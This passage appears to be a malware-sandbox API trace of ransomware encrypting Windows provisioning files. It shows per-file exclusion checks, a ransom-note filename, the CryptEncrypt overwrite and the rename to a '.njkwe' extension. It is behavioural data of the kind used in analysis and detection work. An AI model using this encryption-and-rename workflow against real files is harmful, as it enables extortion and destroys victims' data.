"c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\340__cellular_persimsettings_$(__iccid)_appid.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\340__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\340__cellular_persimsettings_$(__iccid)_appid.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.451] GetProcessHeap () returned 0xbe0000 [0078.451] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.451] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c9060a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c9060a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c9060a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x283, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", cAlternateFileName="341__C~1.PRO")) returned 1 [0078.452] lstrcmpiW (lpString1="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.452] lstrcmpiW (lpString1="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.452] lstrcmpiW (lpString1="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.452] lstrcmpiW (lpString1="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.452] lstrcmpiW (lpString1="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.452] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml") returned 163 [0078.452] StrStrIW (lpFirst="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.452] lstrcmpW (lpString1="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.452] lstrcmpW (lpString1="341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.452] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\341__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.452] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\341__connections_cellular_claro (puerto rico)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.452] GetTickCount () returned 0x1153f19 [0078.452] GetTickCount () returned 0x1153f19 [0078.452] GetTickCount () returned 0x1153f19 [0078.452] GetTickCount () returned 0x1153f19 [0078.452] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.452] GetProcessHeap () returned 0xbe0000 [0078.452] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.452] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0078.454] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.454] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0078.454] GetProcessHeap () returned 0xbe0000 [0078.454] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.454] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.454] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.455] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.455] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.455] CloseHandle (hObject=0x43c) returned 1 [0078.455] GetProcessHeap () returned 0xbe0000 [0078.455] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.455] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.455] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\341__connections_cellular_claro (puerto rico)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\341__Connections_Cellular_Claro (Puerto Rico)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\341__connections_cellular_claro (puerto rico)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.456] GetProcessHeap () returned 0xbe0000 [0078.456] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.456] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90c9060a, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90c9060a, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90c9060a, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", cAlternateFileName="342__C~1.PRO")) returned 1 [0078.456] lstrcmpiW (lpString1="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.456] lstrcmpiW (lpString1="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.456] lstrcmpiW (lpString1="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.456] lstrcmpiW (lpString1="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.456] lstrcmpiW (lpString1="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.456] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml") returned 163 [0078.456] StrStrIW (lpFirst="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.456] lstrcmpW (lpString1="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.456] lstrcmpW (lpString1="342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.456] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\342__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.456] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\342__connections_cellular_claro (puerto rico)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.456] GetTickCount () returned 0x1153f19 [0078.456] GetTickCount () returned 0x1153f19 [0078.456] GetTickCount () returned 0x1153f19 [0078.456] GetTickCount () returned 0x1153f19 [0078.456] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.457] GetProcessHeap () returned 0xbe0000 [0078.457] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.457] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0078.458] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.458] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d3, lpOverlapped=0x0) returned 1 [0078.458] GetProcessHeap () returned 0xbe0000 [0078.458] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.458] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.458] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.458] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.458] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.459] CloseHandle (hObject=0x43c) returned 1 [0078.459] GetProcessHeap () returned 0xbe0000 [0078.459] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.459] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 183 [0078.459] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\342__connections_cellular_claro (puerto rico)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\342__Connections_Cellular_Claro (Puerto Rico)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\342__connections_cellular_claro (puerto rico)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.459] GetProcessHeap () returned 0xbe0000 [0078.460] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.460] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cb6875, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cb6875, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cb6875, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x27f, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", cAlternateFileName="343__C~1.PRO")) returned 1 [0078.460] lstrcmpiW (lpString1="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.460] lstrcmpiW (lpString1="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.460] lstrcmpiW (lpString1="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.460] lstrcmpiW (lpString1="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.460] lstrcmpiW (lpString1="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.460] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml") returned 157 [0078.460] StrStrIW (lpFirst="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.460] lstrcmpW (lpString1="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.460] lstrcmpW (lpString1="343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.460] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\343__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.460] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\343__connections_cellular_q-tel (qatar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.460] GetTickCount () returned 0x1153f19 [0078.460] GetTickCount () returned 0x1153f19 [0078.460] GetTickCount () returned 0x1153f19 [0078.460] GetTickCount () returned 0x1153f19 [0078.460] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.460] GetProcessHeap () returned 0xbe0000 [0078.460] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.460] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x27f, lpOverlapped=0x0) returned 1 [0078.462] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd81, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.462] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x27f, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x27f, lpOverlapped=0x0) returned 1 [0078.462] GetProcessHeap () returned 0xbe0000 [0078.462] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.462] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0078.462] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0078.462] CloseHandle (hObject=0x43c) returned 1 [0078.462] GetProcessHeap () returned 0xbe0000 [0078.462] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0078.462] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 177 [0078.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\343__connections_cellular_q-tel (qatar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\343__Connections_Cellular_Q-Tel (Qatar)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\343__connections_cellular_q-tel (qatar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0078.463] GetProcessHeap () returned 0xbe0000 [0078.463] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0078.463] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90cb6875, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x90cb6875, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x90cb6875, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2dd, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", cAlternateFileName="344__C~1.PRO")) returned 1 [0078.463] lstrcmpiW (lpString1="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0078.463] lstrcmpiW (lpString1="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0078.463] lstrcmpiW (lpString1="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0078.463] lstrcmpiW (lpString1="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0078.463] lstrcmpiW (lpString1="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0078.463] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml") returned 166 [0078.463] StrStrIW (lpFirst="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0078.463] lstrcmpW (lpString1="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0078.463] lstrcmpW (lpString1="344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0078.463] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\344__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0078.464] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\344__Connections_Cellular_Vodafone Qatar (Qatar)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\344__connections_cellular_vodafone qatar (qatar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0078.464] GetTickCount () returned 0x1153f19 [0078.464] GetTickCount () returned 0x1153f19 [0078.464] GetTickCount () returned 0x1153f19 [0078.464] GetTickCount () returned 0x1153f19 [0078.464] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0078.464] GetProcessHeap () returned 0xbe0000 [0078.464] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0078.464] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0078.466] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd23, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.466] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2dd, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2dd, lpOverlapped=0x0) returned 1 [0078.466] GetProcessHeap () returned 0xbe0000 [0078.466] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0078.466] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.466] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: 